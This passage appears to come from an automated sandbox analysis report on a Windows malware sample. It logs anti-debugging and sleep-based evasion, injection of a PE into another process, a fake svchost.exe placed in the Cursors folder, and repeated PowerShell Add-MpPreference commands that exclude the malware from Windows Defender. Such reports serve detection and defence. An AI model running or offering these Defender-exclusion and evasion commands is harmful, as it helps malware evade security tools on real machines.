                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe TID: 6912Thread sleep count: 100 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5544Thread sleep count: 63 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5080Thread sleep count: 35 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep count: 39 > 30
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: svchost.exe, 00000004.00000002.253983082.0000015A16F40000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: lfQuSBwdSf.exe, 00000000.00000002.339679694.000000000134F000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
                      Source: svchost.exe, 00000004.00000002.253983082.0000015A16F40000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: svchost.exe, 00000004.00000002.253983082.0000015A16F40000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: svchost.exe, 00000004.00000002.253983082.0000015A16F40000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information queried: ProcessInformation

                      Anti Debugging:

                      barindex
                      Hides threads from debuggersShow sources
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess queried: DebugPort
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess queried: DebugPort
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess queried: DebugPort
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess queried: DebugPort
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess token adjusted: Debug
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Adds a directory exclusion to Windows DefenderShow sources
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lfQuSBwdSf.exe' -Force
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lfQuSBwdSf.exe' -Force
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeMemory written: unknown base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lfQuSBwdSf.exe' -Force
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess created: C:\Users\user\Desktop\lfQuSBwdSf.exe C:\Users\user\Desktop\lfQuSBwdSf.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeQueries volume information: C:\Users\user\Desktop\lfQuSBwdSf.exe VolumeInformation
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
